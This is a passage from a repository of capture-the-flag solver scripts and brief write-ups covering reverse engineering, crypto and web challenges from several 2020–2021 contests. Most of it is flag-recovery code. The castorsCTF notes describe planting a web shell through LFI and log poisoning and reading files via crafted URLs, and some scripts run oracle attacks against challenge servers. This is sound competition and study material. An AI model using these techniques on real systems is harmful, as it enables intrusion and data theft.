a1_16] ^ a5 ^ ord(a2[i]) ^ i ^ a1_8[1] ^ v6 ^ 0 ) 14 | print flag -------------------------------------------------------------------------------- /solver/2020/batpwn2020/solver_army.py: -------------------------------------------------------------------------------- 1 | a="huL{SEp^H6?!" 2 | 3 | for j in range(20): 4 | flag="" 5 | cnt=j 6 | for i in a: 7 | flag+=chr(ord(i)^(cnt)) 8 | cnt+=7 9 | print flag 10 | -------------------------------------------------------------------------------- /solver/2020/batpwn2020/solver_fast.py: -------------------------------------------------------------------------------- 1 | from websocket import create_connection 2 | import datetime 3 | ws = create_connection("ws://challenges.ctfd.io:30065/") 4 | print(ws.recv()) 5 | ws.send("y") 6 | while True: 7 | try: 8 | tmp=ws.recv().strip().split(" ") 9 | print(tmp) 10 | tmp2=list(map(int,tmp[0].split("-"))) 11 | tmp3=list(map(int,tmp[1].split(":"))) 12 | ans=int(datetime.datetime(tmp2[0],tmp2[1],tmp2[2],tmp3[0],tmp3[1],tmp3[2]).strftime('%s'))+25200 13 | ws.send(str(ans)) 14 | print(ans) 15 | except Exception as e: 16 | print(ws.recv()) 17 | -------------------------------------------------------------------------------- /solver/2020/batpwn2020/solver_noob.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python2 2 | 3 | import string 4 | from hashlib import md5 5 | from itertools import izip, cycle 6 | import base64 7 | import time 8 | 9 | def xorer(data, key): 10 | return bytearray(a^b for a, b in zip(*map(bytearray, [data, key]))) 11 | 12 | flag="SQD@G^KRCH@D^VCPAXHnYCoSUPEDYWD\\oQBEL" 13 | 14 | for i in range(1589414400,1589414400+100000): 15 | timestamp = i 16 | key = md5(str(int(timestamp))).hexdigest() 17 | my_hexdata = key 18 | scale = 16 19 | num_of_bits = 8 20 | noobda = bin(int(my_hexdata, scale))[2:].zfill(num_of_bits) 21 | tmp=xorer(flag,noobda) 22 | # print tmp 23 | if "batpwn{cryptography" in tmp: 24 | print tmp 25 | 26 | 27 | 28 | 29 | -------------------------------------------------------------------------------- /solver/2020/castorsCTF2020/bane.md: -------------------------------------------------------------------------------- 1 | * There is lfi in app.php 2 | * using that vulnerability try to write backdoor on server using log poisoning ( credit @dmcr7 ) 3 | search flag 4 | * Final Payload : 5 | `http://web1.cybercastors.com:14438/myshell.php?0=cat%20/home/falg/flag/test/why/the/hassle/right/flag.txt` 6 | -------------------------------------------------------------------------------- /solver/2020/castorsCTF2020/quiz.md: -------------------------------------------------------------------------------- 1 | * Reading the source on /backup/ found test endpoint that call super function 2 | * using that endpoint to read file on /home/jeff/flag.txt 3 | * Final Payload : 4 | `curl http://web1.cybercastors.com:14436/test/home/jeff/flag.txt` 5 | -------------------------------------------------------------------------------- /solver/2020/castorsCTF2020/solver_bagelbytes.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | import string 3 | 4 | r=remote("chals20.cybercastors.com",14420) 5 | flag="" 6 | payload=list("A"*(47-len(flag))) 7 | while '}' not in flag: 8 | print "flag :",flag 9 | r.recvuntil("Your choice:") 10 | r.sendline("2") 11 | r.recvuntil("Add your bagels:") 12 | r.sendline(''.join(payload)) 13 | r.recvuntil("bytes:\n") 14 | tmp=r.recvline().strip()[64:96] 15 | for i in string.printable[:-6]: 16 | r.recvuntil("Your choice:") 17 | r.sendline("2") 18 | r.recvuntil("Add your bagels:") 19 | r.sendline(''.join(payload)+flag+i) 20 | r.recvuntil("bytes:\n") 21 | tmp2=r.recvline().strip()[64:96] 22 | if(tmp==tmp2): 23 | flag+=i 24 | if(len(payload)!=0): 25 | payload=payload[:-1] 26 | break 27 | print "FLAG : ",flag -------------------------------------------------------------------------------- /solver/2020/castorsCTF2020/solver_water.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python3 2 | import random 3 | 4 | seed=1590782400 5 | test=[150,2,103,102,192,216,52,128,9,144,10,201,209,226,22,10,80,5,102,195,23,71,77,63,111,116,219,22,113,89,187,232,198,53,146,112,119,209,64,79,236,179] 6 | random.seed(seed) 7 | for i in range(42): 8 | for j in range(len(test)): 9 | tmp=random.randint(0,255) 10 | test[j]=test[j]^tmp 11 | if(test[0]==99): 12 | print(''.join(map(chr,test))) 13 | -------------------------------------------------------------------------------- /solver/2020/dc9112020/solver_rsa.py: -------------------------------------------------------------------------------- 1 | from Crypto.Util.number import * 2 | from Crypto.PublicKey import RSA 3 | from pwn import * 4 | 5 | def _decrypt(ciphertext): 6 | r.recvuntil("Enter your choice = ") 7 | r.sendline("2") 8 | r.recvuntil("Enter the cipher text you want to decrypt =") 9 | r.sendline(ciphertext.encode("hex")) 10 | r.recvuntil("Output = ") 11 | pt = r.recvline().strip() 12 | return int(pt) 13 | 14 | r = remote("206.189.141.41",7070) 15 | r.recvuntil(": ") 16 | enc=r.recvline().strip().decode('hex') 17 | r.recvuntil("Modulus = ") 18 | N=int(r.recvline().strip(),16) 19 | 20 | e = 65537 21 | upper_limit = N 22 | lower_limit = 0 23 | 24 | flag = "" 25 | i = 1 26 | while lower_limit>2 69 | # r3=r3&0xff 70 | # r2=r3 71 | # r3=var18 72 | # r3=r3[byte] 73 | # r3=r2+r3 74 | # cmp r3 0x66 (f) 75 | # if(r3!=0x66) lose 76 | 77 | #fail 78 | # def msb(i): 79 | # a = bin(i)[2:] 80 | # a = '0'*(64-len(a))+a 81 | # b = a[0:32] # gets first SEVEN characters of string a 82 | # c = int(b,2) 83 | # return c 84 | 85 | # for i in x: 86 | # r2=0x4ec4ec4f 87 | # tmp=r2*ord(i) 88 | # r3=msb(tmp) 89 | # r3=r3>>2 90 | # r3=r3&0xff 91 | # r2=r3 92 | # r3=ord('b') 93 | # r3=r2+r3 94 | # if(r3==0x66): 95 | # print "x",i 96 | # break 97 | 98 | 99 | # r3=var18 100 | # r3=r3+1 101 | # r3=r3[byte] 102 | # r0=r3 103 | # r3=var18 104 | # r3=r3+9 105 | # r3=r3[byte] 106 | # r1=r3 107 | # r3=r1 108 | # r3=r3<<1 109 | # r3=r3+r1 110 | # r2=r3<<3 111 | # r2=r2-r3 112 | # r2=r2<<1 113 | # r3=r2+r1 114 | # r3=r0|r3 115 | # r2=0x833 116 | # if(r3!=r2) lose 117 | 118 | for i in y: 119 | r0=ord(i) 120 | r3=ord(flag[9]) 121 | r1=r3 122 | r3=r1 123 | r3=r3<<1 124 | r3=r3+r1 125 | r2=r3<<3 126 | r2=r2-r3 127 | r2=r2<<1 128 | r3=r2+r1 129 | r3=r0|r3 130 | r2=0x833 131 | if(r3==r2): 132 | flag[1]=i 133 | flag[8]=x[y.index(i)] 134 | break 135 | 136 | 137 | # r3=var18 138 | # r3=r3+7 139 | # r3=r3[byte] 140 | # if(r3!=0x69(i)) lose 141 | 142 | flag[7]='i' 143 | 144 | # r3=0 145 | # var8=r3 146 | 147 | 148 | # r3=var8 149 | # if(r3<=4) loop 150 | 151 | # loop: 152 | # r3=var8 153 | # r3=r3+2 154 | # r2=r3 155 | # r3=var18 156 | # r3=r3+r2 157 | # r2=r3[byte] 158 | # r3=var8 159 | # cmp r3 0 160 | # r3=r3&1 161 | # if r3 is less than zero, set r3 to 0 - r3 162 | # r1=r3 163 | # r3=var10 164 | # r3=r3+r1 165 | # r3=r3[byte] 166 | # r3=r3^r2 167 | # r2=r3&0xff 168 | # r3=var8 169 | # r1=varc 170 | # r3=r1+r3 171 | # r3=r3[byte] 172 | # if(r2==r3) : false fail 173 | # r3=var8 174 | # r3=r3+1 175 | # var8=r3 176 | 177 | var8=0 178 | r3=var8 179 | z=[] 180 | while(var8<=4): 181 | r3=var8 182 | r3=r3+2 183 | count=r3 184 | # r3=r3 185 | # r3=r3+r2 186 | # r2=r3[byte] 187 | # r2=r3[r2] 188 | print count 189 | for j in string.printable[:-6]: 190 | r2=ord(j) 191 | r3=var8 192 | # cmp r3 0 193 | # if(r3==0): 194 | # r3=r3&1 195 | # if r3 is less than zero, set r3 to 0 - r3 196 | r3=r3&1 197 | # print "r3 ",r3 198 | if(r3<0): 199 | r3=0-r3 200 | r1=r3 201 | r3=var10 202 | # r3=r3+r1 203 | r3=ord(r3[r1]) 204 | r3=r3^r2 205 | r2=r3&0xff 206 | r3=var8 207 | r1=varc 208 | # r3=r1+r3 209 | r3=r1[r3] 210 | if(r2==ord(r3)): 211 | flag[count]=j 212 | # print r3 213 | # print z 214 | r3=var8 215 | r3=r3+1 216 | var8=r3 217 | print 'd33p{'+''.join(flag)+'}' -------------------------------------------------------------------------------- /solver/2020/redpwn2020/solver_r1sc.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python3 2 | 3 | cnt=0 4 | class SolverEquation(gdb.Command): 5 | def __init__ (self): 6 | super (SolverEquation, self).__init__ ("solve-equation",gdb.COMMAND_OBSCURE) 7 | 8 | def invoke (self, arg, from_tty): 9 | global cnt 10 | gdb.execute("b *0x555555555094",to_string=True) 11 | gdb.execute("b *0x555555555031",to_string=True) 12 | input_val=[0x555555557038,0x555555557050,0x555555557058,0x555555557060,0x555555557068,0x555555557070,0x555555557078] 13 | while True: 14 | gdb.execute("c",to_string=True) 15 | tmp = gdb.execute("x/gx $rbp+$rbx*8",to_string=True) 16 | op2 = int(tmp.split(":")[0].strip(),16) 17 | if(op2 in input_val): 18 | tmp = gdb.execute("p $rax",to_string=True) 19 | op3 = int(tmp.split("=")[1].strip(),16) 20 | print(cnt,hex(op2),hex(op3)) 21 | cnt+=1 22 | break 23 | else: 24 | print(cnt,hex(op2)) 25 | cnt+=1 26 | gdb.execute("nexti",to_string=True) 27 | SolverEquation() -------------------------------------------------------------------------------- /solver/2020/zer0pts2020/easy_strcmp.py: -------------------------------------------------------------------------------- 1 | a=[0x410a4335494a0942,0x0b0ef2f50be619f0,0x4f0a3a064a35282b] 2 | b=['********','CENSORED','********'] 3 | flag="" 4 | for i in range(len(a)): 5 | flag+=(hex(int(b[i][::-1].encode('hex'),16)+a[i]))[2:].decode('hex')[::-1] 6 | print "zer0pts{"+flag+"}" -------------------------------------------------------------------------------- /solver/2021/BtSCTF2021/helper_bf.py: -------------------------------------------------------------------------------- 1 | # a = [6,26,23,7,24,10,3,23,11,26,31,30,23,6,22,9,31,6,3,8,1,26,31,13,12,14,18,10,0,10,31,30,7,6,21,10,12,22,29,9,32,21,28,16,1,10,1,10,31,3,3,8,1,26,65534,10,27,14,18,16,19,18,28,8,23,7,1,29,28,22,16,7,8,7,0,20,27,21,65535,29,24,6,23,26,11,17,3,25,32,9,29,16,15,6,30,8,1,26,31,9,31,29,13,23,11,10,16,7,0,26,31,18,11,22,6,8,23,2,27,5] 2 | # for i in range(0,0xff+1): 3 | # x = a[0] 4 | # tmp = "" 5 | # for j in a: 6 | # tmp += chr((i+j-x)&0xff) 7 | # print i,tmp 8 | import base64 9 | 10 | list_char = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/" 11 | target = "SGVyZSBpcyB5b3VyIHJld2FyZCBodHRwczovL3d3dy55b3t" 12 | for i in list_char: 13 | tmp = base64.b64decode(target+i) 14 | if(tmp[-1]=='t'): 15 | print(i) 16 | # while True: 17 | # try: 18 | # print(base64.b64decode(raw_input("b64 payload : "))) 19 | # except Exception as e: 20 | # print "error" -------------------------------------------------------------------------------- /solver/2021/BtSCTF2021/helper_emulator.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python3 2 | 3 | static_val=[] 4 | class SolverEquation(gdb.Command): 5 | def __init__ (self): 6 | super (SolverEquation, self).__init__ ("solve-equation",gdb.COMMAND_OBSCURE) 7 | 8 | def invoke (self, arg, from_tty): 9 | global static_val 10 | gdb.execute("b *0x555555555910") 11 | for i in range(25): 12 | gdb.execute("c",to_string=True) 13 | val = addr2num(gdb.selected_frame().read_register("eax")) 14 | gdb.execute("set $edx=$eax",to_string=True) 15 | static_val.append(val) 16 | print(''.join(map(chr,static_val))) 17 | 18 | def addr2num(addr): 19 | try: 20 | return int(addr)&0xff # Python 3 21 | except: 22 | return long(addr) # Python 2 23 | SolverEquation() -------------------------------------------------------------------------------- /solver/2021/BtSCTF2021/solver_bf.py: -------------------------------------------------------------------------------- 1 | import string 2 | import base64 3 | 4 | a = [6,26,23,7,24,10,3,23,11,26,31,30,23,6,22,9,31,6,3,8,1,26,31,13,12,14,18,10,0,10,31,30,7,6,21,10,12,22,29,9,32,21,28,16,1,10,1,10,31,3,3,8,1,26,65534,10,27,14,18,16,19,18,28,8,23,7,1,29,28,22,16,7,8,7,0,20,27,21,65535,29,24,6,23,26,11,17,3,25,32,9,29,16,15,6,30,8,1,26,31,9,31,29,13,23,11,10,16,7,0,26,31,18,11,22,6,8,23,2,27,5] 5 | upper = 60 6 | lower = 90 7 | num = 50 8 | sym = 120 9 | zz = 64 10 | possible = [] 11 | for i in a: 12 | try: 13 | tmp2 = [] 14 | tmp = chr(upper+i) 15 | if(tmp in string.uppercase): 16 | tmp2.append(tmp) 17 | tmp = chr(lower+i) 18 | if(tmp in string.lowercase): 19 | tmp2.append(tmp) 20 | tmp = chr(num+i) 21 | if(tmp in string.digits): 22 | tmp2.append(tmp) 23 | tmp = chr(sym+i) 24 | if(tmp in string.punctuation): 25 | tmp2.append(tmp) 26 | tmp = chr(zz+i) 27 | if(tmp in string.punctuation): 28 | tmp2.append(tmp) 29 | possible.append(tmp2) 30 | except Exception as e: 31 | if(i==65534): 32 | possible.append(["0"]) 33 | elif(i==65535): 34 | possible.append(["1"]) 35 | 36 | encode = "" 37 | for i in range(7,len(possible)-1,4): 38 | print "Loop : "+str(i) 39 | first = possible[i] 40 | second = possible[i+1] 41 | third = possible[i+2] 42 | fourth = possible[i+3] 43 | for j in first: 44 | for k in second: 45 | for l in third: 46 | for m in fourth: 47 | try: 48 | tmp = j+k+l+m 49 | tmp2 = base64.b64decode(encode+tmp) 50 | print "Encoding :",encode+tmp 51 | print "Plaintext : ",tmp2 52 | except Exception as e: 53 | continue 54 | encode = raw_input("\nTrue Encode : ") 55 | print("BtS-CTF{"+encode+"}") -------------------------------------------------------------------------------- /solver/2021/BtSCTF2021/solver_emulator.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python3 2 | 3 | static_val=[] 4 | class SolverEquation(gdb.Command): 5 | def __init__ (self): 6 | super (SolverEquation, self).__init__ ("solve-equation",gdb.COMMAND_OBSCURE) 7 | 8 | def invoke (self, arg, from_tty): 9 | global static_val 10 | gdb.execute("b *0x555555555910") 11 | for i in range(25): 12 | gdb.execute("c",to_string=True) 13 | val = addr2num(gdb.selected_frame().read_register("eax")) 14 | gdb.execute("set $edx=$eax",to_string=True) 15 | static_val.append(val) 16 | print(''.join(map(chr,static_val))) 17 | 18 | def addr2num(addr): 19 | try: 20 | return int(addr)&0xff # Python 3 21 | except: 22 | return long(addr) # Python 2 23 | SolverEquation() -------------------------------------------------------------------------------- /solver/2021/BtSCTF2021/solver_shake.py: -------------------------------------------------------------------------------- 1 | from Crypto.Util.number import long_to_bytes as l2b 2 | target = 0x4a3ad948eb3eceb425b74609f480951c3d5503a3a9f4bef9d713dae9dc14d71e1e155192 3 | tmp = bin(target)[2:] 4 | tmp = [tmp[i:i+3] for i in range(0,len(tmp),3)] 5 | 6 | flag = [] 7 | flag.append(tmp[0].rjust(3,'0')) 8 | for i in range(1,len(tmp)): 9 | flag.append(bin(int(tmp[i],2)^int(flag[i-1],2))[2:].rjust(3,'0')) 10 | flag[-1]=flag[-1][1:] 11 | print(l2b(int(''.join(flag),2))) -------------------------------------------------------------------------------- /solver/2021/BtSCTF2021/solver_spin.py: -------------------------------------------------------------------------------- 1 | import string 2 | 3 | enc = "]1nH^oa86K2z0kL+z*NzmLQ%Rz/Kp+_zSOSt:" 4 | flag = "" 5 | for i in enc: 6 | tmp = chr(ord(i)-0x1b) 7 | if(tmp not in string.printable[:-6]): 8 | tmp = chr(ord(tmp)+94) 9 | flag += tmp 10 | print flag -------------------------------------------------------------------------------- /solver/2021/IJCTF2021/README.md: -------------------------------------------------------------------------------- 1 | # Reverse Engineering - IJCTF 2021 2 | Quick overview about my approach to solve RE challenges in IJCTF 2021 3 | ## Sanity - 100 pts 4 | - Breakpoint on address that call strcmp function 5 | - See argument on that strcmp function , one of them must be a flag 6 | ## Hello World - 738 pts 7 | - There are encrypted section of assembly ( part of x and y function ) 8 | - Breakpoint on hardware access to our input 9 | - Analyze the x and y ( after decrypted ) 10 | - each two bytes has a mapped value , so by generating the mapped value ( ciphertext ) and the original value ( plaintext ) we can solve this chall 11 | - Final solver : [solver_hello.py](solver_hello.py) 12 | ## Family - 940 pts 13 | - This chall is about playing with ptrace 14 | - Int 3 called to trigger ptrace 15 | - Executed instruction ( in function 0x8049248 ) is based on that value filled before ptrace called ( eax - function 0x804948F ) , also with another value such as input per byte that passed to instruction in function 0x804948F 16 | - So determine order of instructions and what it means by analyze function 0x8049248 and 0x804948F 17 | - Final solver : [solver_family.py](solver_family.py) 18 | ## Time - 988 pts 19 | - Find comparison value in function 0x140B 20 | ``` 21 | v1 = sub_1257(i, 53LL, 899LL); 22 | if ( v0 != sub_1257(v1, 67LL, 899LL) ) 23 | v4 = 1; 24 | ``` 25 | - We need to make v0 same as return value from sub_1257(v1, 67LL, 899LL) 26 | - Data on 0x4080 and 0x41a0 passed to function on 0x2008,0x2028,0x2040,and 0x2062 27 | - 0x42C0 hold list of instruction consisting of 0x2008,0x2028,0x2040,and 0x2062 function 28 | - 0x43E0 hold list of instruction consisting of 0x2008,0x2028,0x2040,and 0x2062 function 29 | - List of instruction in 0x42C0 with argument from address 0x4080 used to generate value that will be compared with the value of comparison 30 | - List of instruction in 0x43E0 used to generate flag with argument from 0x41a0 31 | - The value on 0x4080 and 0x41a0 are shuffled ( random ) but paired , 0x4080 + x swap with 0x4080 + y , so 0x41a0 + x will be swapped with 0x41a0 + y too 32 | - The value on 0x42C0 and 0x43e0 are shuffled ( random ) but paired , 0x42c0 + x swap with 0x42c0 + y , so 0x43e0 + x will be swapped with 0x43e0 + y too 33 | - All of list instruction in 0x42C0 and 0x43E0 have the same value for its argument ( paired ) 34 | - So we can solve this by determining the order of instruction in 0x43E0 based on 0x42C0 35 | - Final solver : [solver_time.py](solver_time.py) 36 | ## Derusting - 999 pts 37 | - Created using rust 38 | - Our input length will be padded to even length , so there is null byte added at the end if our input length is odd 39 | - Initial value for map and order is list of index based on our input. if our input length is 4 so the initial value is [0,1,2,3] 40 | - There is seed used to generate random value , the seed is based on our input ( xor each other of our input ) 41 | - Map and order value will be shuffled 42 | - Order variable used as index of our input that will be calculated with xor ( saved in enc variable ) 43 | - Map variable used to shuffled the order of the input after calculated with xor ( saved in enc variable ) 44 | - Last value of our input will be added to the end of enc variable 45 | - So we can solve this by bruteforcing the seed ( only one byte ) , get the map and order value then reverse the function 46 | - Map the enc variable to its original order based on map variable 47 | - Because we only know the last byte we need to find the that last byte value and then we can reverse the xor 48 | ``` 49 | # example 50 | # res[0] = flag[3] ^ flag[2] 51 | # res[1] = flag[2] ^ flag[1] 52 | # res[2] = flag[1] ^ flag[4] 53 | # res[3] = flag[4] ^ flag[0] 54 | # res[4] = flag[0] ^ flag[5] 55 | ``` 56 | - Determine flag[5] value position based on order variable then calculate other value with known value 57 | - For that example the order of getting flag value based on above example is : 58 | ``` 59 | flag[5] -> flag[0] -> flag[4] -> flag[1] -> flag[2] -> flag[3] 60 | ``` 61 | - The process of mapping and xoring with a shuffled index is n times , where n is the length of our input 62 | - There is another script that i used to dump the map and order value ( [helper_rust.py](helper_rust.py) ) 63 | - Final solver : [solver_rust.py](solver_rust.py) 64 | -------------------------------------------------------------------------------- /solver/2021/IJCTF2021/Rusty: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kos0ng/ctf-writeups/4a28087d247f5721b8e0ee6083399ace5def9a84/solver/2021/IJCTF2021/Rusty -------------------------------------------------------------------------------- /solver/2021/IJCTF2021/family: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kos0ng/ctf-writeups/4a28087d247f5721b8e0ee6083399ace5def9a84/solver/2021/IJCTF2021/family -------------------------------------------------------------------------------- /solver/2021/IJCTF2021/hello_world: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kos0ng/ctf-writeups/4a28087d247f5721b8e0ee6083399ace5def9a84/solver/2021/IJCTF2021/hello_world -------------------------------------------------------------------------------- /solver/2021/IJCTF2021/helper_rust.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python3 2 | import json 3 | 4 | static_val=[] 5 | class SolverEquation(gdb.Command): 6 | def __init__ (self): 7 | super (SolverEquation, self).__init__ ("solve-equation",gdb.COMMAND_OBSCURE) 8 | 9 | def invoke (self, arg, from_tty): 10 | global static_val 11 | gdb.execute("b *0x555555561530") 12 | gdb.execute("b *0x555555561812") 13 | for i in range(0xff+1): 14 | gdb.execute("r < junk") 15 | gdb.execute("set $rax="+str(i)) 16 | gdb.execute("c") 17 | arr_loop = [] 18 | rcx = gdb.execute("x/gx $rcx",to_string=True) 19 | r8 = gdb.execute("x/gx $r8",to_string=True) 20 | rcx = rcx.strip().split(":\t")[1] 21 | r8 = r8.strip().split(":\t")[1] 22 | for j in range(40): 23 | value_rcx = parse(gdb.execute("x/40gx "+str(rcx),to_string=True)) 24 | value_r8 = parse(gdb.execute("x/40gx "+str(r8),to_string=True)) 25 | arr_loop.append([value_rcx,value_r8]) 26 | gdb.execute("c") 27 | static_val.append(arr_loop) 28 | # print(static_val) 29 | with open('array.txt', 'w') as f: 30 | f.write(json.dumps(static_val)) 31 | 32 | def parse(f): 33 | f = f.split("\n") 34 | result = [] 35 | for i in f: 36 | tmp = i.split("\t") 37 | for j in range(1,len(tmp)): 38 | result.append(int(tmp[j],16)) 39 | return result 40 | 41 | def addr2num(addr): 42 | try: 43 | return int(addr)&0xff # Python 3 44 | except: 45 | return long(addr) # Python 2 46 | SolverEquation() -------------------------------------------------------------------------------- /solver/2021/IJCTF2021/sanity: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kos0ng/ctf-writeups/4a28087d247f5721b8e0ee6083399ace5def9a84/solver/2021/IJCTF2021/sanity -------------------------------------------------------------------------------- /solver/2021/IJCTF2021/solver_family.py: -------------------------------------------------------------------------------- 1 | xor = [0x3a, 0xf7, 0x0, 0x68, 0x6, 0x2e, 0x29, 0x89, 0xf4, 0x67, 0x2e, 0xc6, 0xd6, 0x6e, 0x12, 0x75, 0x1b, 0xba, 0x64, 0x44, 0x1b, 0x24, 0xa5, 0x30, 0x3a, 0xfe, 0xa7, 0xd, 0x74, 0xaf, 0x99, 0xce, 0x12, 0xe1, 0x1a, 0x92, 0x87, 0xf3, 0xdd, 0xdd, 0xf3] 2 | add = [0xbb, 0xf0, 0xd9, 0xf2, 0x28, 0x63, 0xa1, 0x93, 0x92, 0xc5, 0x35, 0xee, 0x47, 0x9a, 0x5e, 0x86, 0x26, 0xd7, 0xd5, 0x52, 0xb0, 0x64, 0x92, 0xe3, 0xe8, 0x4c, 0x82, 0xa4, 0xb8, 0x9f, 0x9a, 0xc0, 0xa8, 0xce, 0x10, 0x7a, 0xe3, 0xbf, 0xc7, 0xd5, 0x3b] 3 | sub = [0xc9, 0x6, 0xa4, 0x4e, 0x5d, 0x33, 0xcb, 0xe7, 0xca, 0xb3, 0x77, 0xe3, 0x64, 0xc, 0x8b, 0xc8, 0xee, 0x14, 0xa2, 0x70, 0x42, 0x89, 0xbf, 0xe2, 0x22, 0x1a, 0xb9, 0xf5, 0x9a, 0x71, 0xb2, 0xba, 0x3c, 0x3e, 0x6d, 0xaf, 0xbd, 0xa, 0x1d, 0x82, 0x64] 4 | cmp_val = [0x65, 0xa7, 0x78, 0xe0, 0xb, 0x85, 0x34, 0x8d, 0x55, 0x4a, 0x8, 0xba, 0x95, 0xbf, 0x4e, 0xe8, 0xb7, 0x98, 0x6e, 0x12, 0xe1, 0x28, 0xa9, 0x70, 0xd3, 0xd1, 0x8b, 0x1e, 0x2f, 0xf9, 0x97, 0x1, 0xe0, 0x15, 0x1e, 0x71, 0xe4, 0x77, 0x68, 0x11, 0x65] 5 | flag = "" 6 | for i in range(0x29): 7 | flag += chr(((cmp_val[i] + sub[i] - add[i])^xor[i])&0xff) 8 | print flag -------------------------------------------------------------------------------- /solver/2021/IJCTF2021/solver_hello.py: -------------------------------------------------------------------------------- 1 | # flag = "maqlo1337q" 2 | 3 | f = open("flag.txt.enc").read() 4 | 5 | map_value = {} 6 | for i in range(0xff+1): 7 | for j in range(0xff+1): 8 | rbp_9 = ((j<<0x4)+(i>>0x4))&0xff 9 | rbp_a = ((i<<0x4)+(j>>0x4))&0xff 10 | for k in range(3): 11 | if(rbp_9>>7==0): 12 | rbp_9*=2 13 | rbp_9&=0xff 14 | else: 15 | rbp_9*=2 16 | rbp_9|=1 17 | rbp_9&=0xff 18 | for k in range(2): 19 | if(rbp_a>>7==0): 20 | rbp_a*=2 21 | rbp_a&=0xff 22 | else: 23 | rbp_a*=2 24 | rbp_a|=1 25 | rbp_a&=0xff 26 | rbp_9^=0x13 27 | rbp_a^=0x37 28 | map_value[chr(rbp_9)+chr(rbp_a)] = chr(i)+chr(j) 29 | flag = "" 30 | for i in range(0,40,2): 31 | flag += map_value[f[i:i+2]] 32 | print flag -------------------------------------------------------------------------------- /solver/2021/IJCTF2021/solver_rust.py: -------------------------------------------------------------------------------- 1 | enc = "424324357b7f0c687d242456495e293d290457373a6d33423c0b4d11386d4c29547d645a652f2428".decode('hex') 2 | init = list(map(ord,list(enc))) 3 | f = open("array.txt").read() 4 | bf = eval(f) 5 | 6 | max_index = len(enc)-1 7 | plain = [0]*len(enc) 8 | plain2 = [0]*len(enc) 9 | for x in bf: 10 | arr = x[::-1] 11 | final = init[:] 12 | for k in arr: 13 | mapp = k[1] 14 | order = k[0] 15 | start = order.index(max_index) 16 | for i in range(len(final)): 17 | plain[mapp[i]] = final[i] 18 | plain2[-1] = plain[-1] 19 | for i in range(start-1,-1,-1): 20 | plain2[order[i]] = plain[i]^plain2[order[i+1]] 21 | for i in range(start+1,len(final)): 22 | plain2[order[i]] = plain[i-1]^plain2[order[i-1]] 23 | final = plain2 24 | res = ''.join(map(chr,final)) 25 | if('IJCTF' in res): 26 | print res 27 | 28 | 29 | # example 30 | # res[0] = flag[3] ^ flag[2] 31 | # res[1] = flag[2] ^ flag[1] 32 | # res[2] = flag[1] ^ flag[4] 33 | # res[3] = flag[4] ^ flag[0] 34 | # res[4] = flag[0] ^ flag[5] -------------------------------------------------------------------------------- /solver/2021/IJCTF2021/solver_time.py: -------------------------------------------------------------------------------- 1 | import time 2 | import string 3 | 4 | def sub_2008(rdi,rsi): 5 | return (rdi*rsi)&0xffffffffffffffff 6 | 7 | def sub_2028(rdi,rsi): 8 | rax = rdi 9 | r14 = rsi 10 | rax += r14 11 | return rax 12 | 13 | def sub_2040(rdi,rsi): 14 | return int(round(rdi/float(rsi))) 15 | 16 | def sub_2062(rdi,rsi): 17 | return rdi-rsi 18 | 19 | def sub_1257(a1,a2,a3): 20 | v4 = a2 21 | v5 = a1% a3 22 | v6 = 1 23 | while(v4): 24 | if(v4&1): 25 | v6 = ( v5 * v6 ) % a3 26 | v5 = v5 * v5 % a3 27 | v4 >>= 1 28 | return v6 29 | 30 | def decode(address,rdi,rsi): 31 | if(address==0x555555556008): 32 | return chr(sub_2008(rdi,rsi)) 33 | elif(address==0x555555556028): 34 | return chr(sub_2028(rdi,rsi)) 35 | elif(address==0x555555556040): 36 | return chr(sub_2040(rdi,rsi)) 37 | elif(address==0x555555556062): 38 | return chr(sub_2062(rdi,rsi)) 39 | 40 | 41 | #0x13d0642 42 | # print sub_2040(0x000000004b8a7deb,0x3d) 43 | 44 | target = [] 45 | for i in range(33): 46 | v1 = sub_1257(i,0x35,0x383) 47 | res = sub_1257(v1,0x43,0x383) 48 | target.append(res) 49 | 50 | arr_4080 = [0x4b8a7deb, 0x3d, 0x8b, 0x1e6, 0x1e, 0x6e, 0x72044d77, 0x77, 0xc391, 0x143, 0x311, 0x13, 0x762762aa, 0xd, 0x1110, 0x6, 0xadac, 0xc3, 0x371, 0x17, 0xcd, 0x1e3, 0x35808, 0x114, 0x78, 0x13, 0x14, 0x1e8, 0x222, 0x16, 0x1d00, 0x100, 0x34, 0x12, 0x45e20cd7, 0x167, 0x34e18, 0x12c, 0x0, 0x1e6, 0x10efd, 0x191, 0x79435e51, 0xbe, 0x12b27, 0x89, 0x333333d1, 0x5, 0x20, 0xc, 0x31e, 0x6, 0x2d, 0x1db, 0x1f8480a5, 0x18e, 0x148, 0x1da, 0x85, 0x7, 0x36fdb, 0x105, 0xb0, 0x1b, 0xd, 0xc] 51 | arr_41a0 = [0x330, 0x10, 0x5771, 0x197, 0x7128, 0x11c, 0x24, 0x22, 0xd7, 0xa1, 0x1a4, 0x171, 0x7bc, 0x14, 0xb, 0x27, 0x4eac, 0x17c, 0x33cc, 0x104, 0x688d, 0x109, 0x35da, 0x71, 0x20e, 0x194, 0x38e0, 0x104, 0x5e, 0x2c, 0x1b, 0x17, 0x123, 0xeb, 0x51, 0x3, 0x3747, 0x10b, 0x44, 0x5, 0x19e, 0x13c, 0x4f0b, 0x163, 0xd, 0x70, 0x58a4, 0xba, 0x41, 0x39, 0x4e2, 0x19, 0x4bb4, 0xcc, 0x6, 0x32, 0x23, 0x11, 0x23, 0x20, 0x58, 0x22, 0x26d, 0x1f2, 0xf, 0x3b] 52 | arr_42c0 = [0x555555556008, 0x555555556028, 0x555555556028, 0x555555556008, 0x555555556040, 0x555555556062, 0x555555556008, 0x555555556040, 0x555555556040, 0x555555556062, 0x555555556028, 0x555555556040, 0x555555556062, 0x555555556028, 0x555555556062, 0x555555556040, 0x555555556062, 0x555555556008, 0x555555556040, 0x555555556040, 0x555555556040, 0x555555556008, 0x555555556040, 0x555555556008, 0x555555556062, 